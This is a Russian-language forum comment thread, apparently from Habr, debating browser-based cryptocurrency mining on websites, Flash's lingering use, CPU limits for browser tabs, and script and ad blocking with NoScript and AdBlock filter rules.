                                                                                            Да когда же вы уже все подохните-то. Флеша-то уже 3 года как нету, а новомодный гипертекстовый векторный html5 чисто для баннеров тормозит мощнее и качественнее в 2 раза минимум
                                                                                            • 0
                                                                                              где флэша нет?
                                                                                              в файрфоксе с демандным флэшом очень хорошо видно, как его нет
                                                                                              • 0
                                                                                                Не знаю, какой степени винтажности сайтами вы пользуетесь, но на данный момент ни одна баннерная сеть не принимает SWF уже минимум 2 года
                                                                                                • 0
                                                                                                  я хз, кто и зачем пытается показывать флэш, но FF постоянно выдаёт запросы на включение
                                                                                                  image
                                                                                                  не рисует картинку почему-то prntscr.com/gq9waa
                                                                                                  • 0

                                                                                                    Ээ? Мне почему-то не выдаёт. За последний год всего пару раз этот запрос видел.

                                                                                                    • 0
                                                                                                      Как видно из вашего скрина, баннер отображается и вовсе без флеша. Потому что Яндекс не принимает баннеры во Флеше.

                                                                                                      Флеш стоит «включать по запросу», не грузится вообще ничего


                                                                                                      Так что весьма вероятно, что флеш используется в качестве фаллбека для воспроизведения, например, звука входящего сообщения или отрисовки изображений в формате, не поддерживаемом вашим браузером. Обычно это ролик размером 1 на 1 пиксель, у которого вообще нет графики и он находится в скрытом слое.

                                                                                                      При переключении в «всегда включать» — так и есть. ИМХО, эти ролики для детекта флеша для статистики или иных внутренних дел.


                                                                                                      Причем тут баннеры?
                                                                                            • +3
                                                                                              В целом идея с майнингом на сайте не такая и плохая при цивилизованном подходе. Для некоторых категорий ресурсов подойдет гораздо лучше рекламы. Проблема только в обеспечении цивилизованности. Было бы неплохо пользователю в браузере иметь возможность ограничивать ресурсы компьютера, которые отдаются для майнига или что-то похожее.
                                                                                              • +1
                                                                                                Проблема в том, что самые наглые в выигрыше будут. Те, кто не будет соблюдать меру и будет гнаться за одноразовой прибылью.
                                                                                                • 0
                                                                                                  Те, кто гонится за одноразовой прибылью как раз таки проиграют в перспективе. Не потому что наглые, а потому что глупые =)

                                                                                                  Вот.
                                                                                                  • 0
                                                                                                    Вопрос масштабов. Если перспектива — 100 лет, то могут и пренебречь -)
                                                                                                  • +3
                                                                                                    «Трагедия общин» же, в чистом виде практически.
                                                                                                    • 0
                                                                                                      Именно поэтому у пользователя должен быть удобный и понятный инструмент для контроля за выделением ресурсов под майнинг. Грубо говоря, пользователь может задать в браузере «всем сайтам выделять не более n процентов ресурсов на майнинг», избранным сайтам задать выше и т.д.
                                                                                                      • +2
                                                                                                        Может быть не будем зацикливаться на майнинге?

                                                                                                        Браузеру разрешено получать у процессора не более N процентов CPU для активной вкладки и M вообще.

                                                                                                        А майнинг там или флэш — дело десятое.
                                                                                                  • –3
                                                                                                    Уже 5-й год как пользуюсь плагином NoScript. Меня всё ещё можно называть параноиком?
                                                                                                    • +2
                                                                                                      Как вообще можно серфить интернет без js? Даже если, допустим, меню на сайте не работает, вы включаете js на всем сайте, со всеми баннерами и майнерами?
                                                                                                      • 0
                                                                                                        > Как вообще можно серфить интернет без js?

                                                                                                        Да как-то без проблем. Просто вручную разрешаю только скрипты с определённых доменов — минимальное количество скриптов для функционирования сайта. В подавляющем большинстве случаев нежелательные скрипты грузятся со сторонних доменов, поэтому мой способ работает.

                                                                                                        Ну и второй уровень защиты в виде ABP (с ручным же фильтрами) никто не отменял.
                                                                                                        • 0
                                                                                                          i3-4160T; AVP8. На одной из машин FF53 с E10S очень сильно тормозил, появилась реклама. Смотрю, пропали все подписки и собственные фильтры. Хорошо, все шаги записаны. Совпадение?
                                                                                                        • +5
                                                                                                          Ну так это именно что «серфить», проглядывать, не теряя время на эти скрипты и баннеры. А на интересных сайтах можно и задержаться, а то и рекламу посмотреть даже. :)
                                                                                                          Земной поклон тем вебмастерам, которые строят все важные динамические вещи, типа меню, на голом CSS+HTML, позволяя просто наслаждаться контентом, ну а лучи диареи тем, кто использует особо упоротые шкуры для CMS, без скриптов показывающие только белый экран. %)
                                                                                                          • 0
                                                                                                            За такое вас заклюют адепты секты свидетелей изоморфного рендеринга и прочие ангулярщики.
                                                                                                    • +6
                                                                                                      Когда ресурсы процессора на 100% жрались всякими падающими снежинками, никто и не чесался. А тут вдруг озаботились. Проблеме лет 15 уже, просто раньше это было результатом дурости, а сегодня — жадности.
                                                                                                      • –4
                                                                                                        А нельзя ли 90% того, что сейчас делается на JavaScript перенести в следующий стандарт HTML, а в новых версиях браузеров по умолчанию отключать JavaScript? Глядишь электроэнергии вполовину меньше потребляться будет, глобальное потепление отступит и смартфоны не нужно будет каждые 5 минут заряжать. У меня 99% вкладок в браузере — это текст, картинки и формы, для чего там JavaScript, жрущий гигабайты и гигагерцы? Плюс ну не научились многие во фронтенд сообществе искать максимальный элемент в массиве кроме как его сортировкой, причём сортируют сами и пузырьком, ну бывает. А тут ещё и майнеры… Ах да, я забыл, у нас же наоборот, JavaScript теперь ещё и в бэкэнде…
                                                                                                        • 0
                                                                                                          Плюс ну не научились многие во фронтенд сообществе искать максимальный элемент в массиве кроме как его сортировкой, причём сортируют сами и пузырьком, ну бывает.

                                                                                                          При чем тут это? Гомно-кодеры есть везде.


                                                                                                          Ах да, я забыл, у нас же наоборот, JavaScript теперь ещё и в бэкэнде…

                                                                                                          И? Так можно рассуждать про все, что не ассемблер.


                                                                                                          А тут ещё и майнеры…

                                                                                                          … которые написаны на WebAssembly


                                                                                                          А нельзя ли 90% того, что сейчас делается на JavaScript перенести в следующий стандарт HTML, а в новых версиях браузеров по умолчанию отключать JavaScript?

                                                                                                          Нельзя. Динамичные страницы например это вообще сложная тема...

                                                                                                          • –2
                                                                                                            При чем тут это? Гомно-кодеры есть везде.

                                                                                                            Но вот распределены они почему-то неравномерно. Надеюсь, Вы не будете спорить, в какой области их больше?

                                                                                                            И? Так можно рассуждать про все, что не ассемблер.

                                                                                                            Почитайте тут

                                                                                                            А тут ещё и майнеры…
                                                                                                            … которые написаны на WebAssembly

                                                                                                            Значит по умлочанию блочим любой активный контент. Если пользователю реально нужен гавнокод на этой странице, он внесёт её в белый список.

                                                                                                            Нельзя. Динамичные страницы например это вообще сложная тема…

                                                                                                            Что-то мне подсказывает, что можно уложиться в десяток-другой типовых сценариев.
                                                                                                          • 0
                                                                                                            А нельзя ли 90% того, что сейчас делается на JavaScript перенести в следующий стандарт HTML

                                                                                                            тогда это будет не htmL
                                                                                                            и начнут на нём писать виртуалки и майнеры
                                                                                                            • 0
                                                                                                              Под переносом в HTML я имел ввиду покрытие 90% типовых вещей, которые сейчас делаются в JS, новыми тегами. А писать императивный код не должно получаться, иначе опять нагавнокодят и намайнят.
                                                                                                              • 0
                                                                                                                На js делается именно логика приложения. Такая, как создать ajax-запрос, получить ответ, модифицировать DOM страницы. Если делать не императивно, выйдет очень эзотерически.
                                                                                                          • +6
                                                                                                            Нужно просто скармливать страницы гугловскому пауку, он же JS обрабатывает, вот пусть майнит, тоже ведь нахаляву контент получает.
                                                                                                            • 0
                                                                                                              Если его вместо рекламы включат — будет печаль. На cnews с включенным adblocker-ом не зайдешь. Также поступят и с таким майнингом. Им без разницы с чего получать доход: с рекламы или с другим способом. И это только начало. Рядовые пользователи будут только за электричество платить.
                                                                                                              • 0
                                                                                                                Одна проблема — если сайт хочет 100% cpu то вопрос возникнет — а какого именно cpu? И что мешает владельцу i7 сказать что у него одноядерный атом (и шейпить соответственно)
                                                                                                                • +2
                                                                                                                  www.cnews.ru — этот? А в чём проблема захода туда с блокировщиком?
                                                                                                                  • 0
                                                                                                                    Мессадж на полэкрана красный с просьбой отключить блокировщик. Если есть способы как избавиться от таких сообщений, прошу подсказать.
                                                                                                                    • 0
                                                                                                                      Не вижу такого. Сработали такие правила:
                                                                                                                      http://counter.yadro.ru/*
                                                                                                                      http://content.rbc.medialand.ru/t*
                                                                                                                      http://mc.yandex.ru/*
                                                                                                                      http://count.*
                                                                                                                      http://*.google-analytics.com/*
                                                                                                                • 0
                                                                                                                  думаю, что если в такие скрипты вставлять не коды майнеров, а коды расчетов математических и физических, полезных для науки. полезных для, например, NASA. будет польза для человечества. а не только какому-то предпренимателю
                                                                                                                  • 0

                                                                                                                    Primecoin.

                                                                                                                    • +1
                                                                                                                      Полезный для NASA — это как раз каким-то предпринимателям, а совсем не науке и, тем более, не человечеству.
                                                                                                                    • +2
                                                                                                                      При должном контроле такого подхода все выглядит очень приятно.Например договорится что сайт нагружает ваш процессор на 10%, в некоторых случаях это даже менее ресурсозатратно чем реклама. НО мне кажется что такая тенденция просто поднимет цену на рекламу и все опять вернутся к старому подходу.

                                                                                                                      Что мне кажется действительно хорошей идеей, так это продажа софта за «криптовремя».Например я хочу себе лицензию adobe photoshop, платить не хочу, копания говорит мне ок держи лицензию, но мы будем майнить с твоего ПК до того момента пока не отработаем свои деньги.Так же добавить функцию регулировки нагрузки или выбора времени в которое программа будет майнить.В результате мой ПК по стоит пару ночей включённым, я получаю софт бесплатно, а разработчики получат свою прибыль.

                                                                                                                      Может пример с фотошопом не самый удачный, но продавать игры за «криптовпемя» можно спокойно, так как железо у геймеров достаточно неплохое.

                                                                                                                      • 0
                                                                                                                        Скорее всего цены на такой майнинг сильно опустят, чтобы за лицензию платить не пару ночей, а несколько месяцев.
                                                                                                                        • 0
                                                                                                                          А сколько можно намайнить на пару ночей?
                                                                                                                          • 0
                                                                                                                            Вроде более или менее точная оценка — при майнинге на GPU на электричество уходит около 10% от заработанного. Так что за пару ночей на хорошей современной видеокарте можно намайнить рублей 10.
                                                                                                                            • 0
                                                                                                                              Насколько я знаю, средняя видеокарта майнера отличается от средней видеокарты среднего посетителя среднего сайта. На порядок-два (учитывая, что у майнеров обычно несколько сразу стоят).
                                                                                                                              • 0
                                                                                                                                Да, но она и энергии кушает меньше. Поэтому оценка остаётся верной (в пределах одного порядка).
                                                                                                                                • 0
                                                                                                                                  Чем слабее видеокарта (тем более если она одна), тем больше приходится питать «паразитов» — процессор, МП, винт(ы), тот же монитор. К тому же, у многих для браузинга используется интегрированный в процессор видеочип, что ещё сильнее снижает потенциальный выхлоп.
                                                                                                                        • 0

                                                                                                                          Чтобы намайнить gta 5 нужно манить месяц на нескольких видеокартах.

                                                                                                                        • 0
                                                                                                                          А можно ли сделать такое же, но чтобы использовались ресурсы видеокарты? Например, через WebGL? Возможно, будет менее заметно.
                                                                                                                          • 0

                                                                                                                            Есть. google://miner%20webgl

                                                                                                                          • 0
                                                                                                                            Стоит отметить, что майнер всё же не встроен в счетчик Метрики, а лишь находится по соседству.
                                                                                                                          • +1
                                                                                                                            Сайт coin-hive.com зарегистрирован у key-systems.net. А это германский провайдер.
                                                                                                                            Я думаю всё же поламали сайт, иначе скрипт удобней тянуть с другими ресурсами сайта.